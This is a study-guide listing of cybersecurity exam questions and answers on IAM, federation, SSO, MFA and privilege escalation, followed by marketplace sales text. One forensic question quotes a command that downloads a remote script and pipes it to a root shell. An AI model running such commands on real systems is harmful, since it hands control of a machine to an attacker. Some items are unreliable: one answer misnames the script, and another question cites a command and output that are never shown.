CIST 2601 Questions And Answers With Verified Study
Solutions
Which of the following BEST describes Central Policy? ANS A program that checks for the correct attributes in
an attribute-based system.
Which of the following is an example of IAM? ANS Entering a PIN
Each user on a network must have a unique digital identity. Which of the following is this known as? ANS
Identity and access management (IAM)
Which of the following is an advantage of setting up a federation? ANS Employees have easier onboarding.
Which of the following BEST describes a federation? ANS Stores a user's credentials so that trusted third parties
can authenticate using those credentials without actually seeing them.
Which of the following allows users to sign into a single trusted account, such as Google or Facebook? ANS SSO
Which of the following is a trust relationship that exists between different organizations or applications? ANS
Federation
You entered your password on a website and are sent a code to your cell phone. Which of the following is this an
example of? ANS MFA
Which of the following BEST describes signing in without single sign-on? ANS The website must have its own
database of user credentials.
Which of the following BEST describes signing in with single sign-on? ANS The website's authentication server
verifies the credentials.
As you review your network's storage shares to ensure permissions have been securely defined, you come across
the following list of users and permissions set to a share on one of your key storage locations. Two of the regular
users should have Read and Write permissions (Bob Barker and Jennifer Banks). The two other individuals should
not (Joseph Lange and Bob Marley), who were both given access during a specific project but should've had their
, Write permissions removed afterward. What is it called when permissions are given for a task but then never
removed when they are no longer required? ANS Privilege creep
When performing an investigation into an intrusion through a Linux box on your network, you find the following
command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do? ANS It
executed the 334526.sh script locally as the root user.
You are testing for password vulnerability and used the command below to probe a Linux machine on your
network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH
port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH
connections are accepted from other IP addresses. Which of the following would MOST likely explain what has
happened? ANS The target server is using Fail2Ban and has started refusing connections from the source IP
address.
An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the
goal behind this attack? ANS To lay a foundation for later.
Which of the following BEST describes horizontal escalation? ANS An attacker trying to access a user on the
same system.
You are monitoring network activity and find that a user appears to be logging into the network and downloading
files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced?
ANS A horizontal privilege escalation attack
An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities.
Which of the following are malicious activities an attacker might use against your system? (Select two.) ANS
Install malware on the system.
Steal confidential information.
Which of the following is a good way to prevent privilege escalation attacks? ANS Limit privileges.
Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for
suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network
security? ANS You could regularly scan your system for vulnerabilities.
The benefits of buying summaries with Stuvia:
Guaranteed quality through customer reviews
Stuvia customers have reviewed more than 700,000 summaries. This how you know that you are buying the best documents.
Quick and easy check-out
You can quickly pay through credit card or Stuvia-credit for the summaries. There is no membership needed.
Focus on what matters
Your fellow students write the study notes themselves, which is why the documents are always reliable and up-to-date. This ensures you quickly get to the core!
Frequently asked questions
What do I get when I buy this document?
You get a PDF, available immediately after your purchase. The purchased document is accessible anytime, anywhere and indefinitely through your profile.
Satisfaction guarantee: how does it work?
Our satisfaction guarantee ensures that you always find a study document that suits you well. You fill out a form, and our customer service team takes care of the rest.
Who am I buying these notes from?
Stuvia is a marketplace, so you are not buying this document from us, but from seller Nipsey. Stuvia facilitates payment to the seller.
Will I be stuck with a subscription?
No, you only buy these notes for $11.49. You're not tied to anything after your purchase.